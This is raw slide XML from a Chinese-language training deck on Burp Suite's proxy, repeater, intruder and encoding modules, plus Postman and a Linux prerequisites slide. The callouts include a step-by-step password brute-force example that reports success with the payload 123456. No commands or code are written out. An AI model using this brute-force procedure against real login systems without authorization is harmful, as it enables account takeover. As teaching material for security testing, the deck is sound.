            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A93F17DA-B711-B74E-BB82-E6CA7A5F7D10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="128" b="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1991032" y="1582710"/>
            <a:ext cx="8772673" cy="5275290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="椭圆形标注 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79C519DC-E7B3-A248-A1A6-6CB2B7CB476F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6377368" y="2595715"/>
            <a:ext cx="2787445" cy="1165123"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A6ED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s" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>设置代理监听的地址，和浏览器一致</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="152779868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Proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>模块</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3022983-9B77-EA42-8F26-A5B95BA12B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7354" y="1702346"/>
            <a:ext cx="9130447" cy="5155654"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="椭圆形标注 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA773AFB-46F8-E148-B556-166EA8B0871F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="979458" y="3967315"/>
            <a:ext cx="2787445" cy="1165123"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A6ED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s" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>拦截请求，可以选择修改和释放</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="122297510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Proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>模块</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF77F045-C42E-B24E-A8C1-3933C023B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960" y="1584047"/>
            <a:ext cx="7982199" cy="5273953"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="椭圆形标注 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D012883A-96BB-4B40-97B1-4010066332BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8030436" y="3055900"/>
            <a:ext cx="2787445" cy="1165123"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A6ED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s" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>可以将请求包发送到其它模块</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="44136022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Repeater</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>模块</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BFD3F67-4663-C946-8030-393ABC528F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007" y="1499960"/>
            <a:ext cx="7510186" cy="5358040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="椭圆形标注 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68C7D95E-65DF-5A41-9D71-0E52651D44A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="284245" y="3055231"/>
            <a:ext cx="2787445" cy="1165123"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A6ED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s" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>点击</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Go</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>，可以发送请求包并查看响应</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="335892752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Intruder</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>模块（密码爆破例子）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B2EEEB3-19AF-1D4C-A5B4-3B2DFFC4330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9" b="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2247814" y="1582711"/>
            <a:ext cx="7924972" cy="5275289"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="椭圆形标注 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{871032AE-21E1-9E41-A23C-6CE3F3D5A5AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5766619" y="5105258"/>
            <a:ext cx="2260529" cy="926834"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A6ED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s" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>标注想要测试的参数位置</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="359238232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Intruder</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>模块（密码爆破例子）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61DB88AF-0374-A34A-96AD-134A41C83DD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="10230" b="4713"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1679720" y="1582710"/>
            <a:ext cx="9303075" cy="5275290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="椭圆形标注 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34D9A0F1-B107-4B40-AF9A-1D015EF55F93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4676467" y="4397334"/>
            <a:ext cx="3067665" cy="1413529"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A6ED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s" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>添加</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>payloads</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>，这些</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>payloads</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>将会替换标注的位置</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24155083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所需知识</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CE3915F-2A63-1743-A167-096F6DE68D95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1358900" y="2638735"/>
            <a:ext cx="8803640" cy="1685846"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Lua</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Docker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DC65920-AE23-F743-BEB7-15325996284E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="716280" y="1005840"/>
            <a:ext cx="5044440" cy="681725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>五</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Linux</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1">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331456900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Intruder</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>模块（密码爆破例子）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46F3E798-112C-DF42-B6F8-ADF5C8435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347" y="1572488"/>
            <a:ext cx="9537291" cy="5285511"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="椭圆形标注 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8A85E21-8113-BF47-ACC9-40C033AA53DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4676467" y="4397334"/>
            <a:ext cx="3067665" cy="1413529"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A6ED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Hans" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>123456</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>的时候爆破成功</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="49808025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Intruder</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>模块（密码爆破例子）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52ABBC7B-AF28-C641-977F-5C3B7B438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026" y="1826487"/>
            <a:ext cx="9695110" cy="5031513"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="椭圆形标注 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFA9A6B7-6110-0E47-BB4B-0A8627AD1470}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4868196" y="3576486"/>
            <a:ext cx="2417507" cy="1231490"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A6ED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s" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>可以对字符串编码解码</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6356001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Postman</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（发送</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>请求并查看响应）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
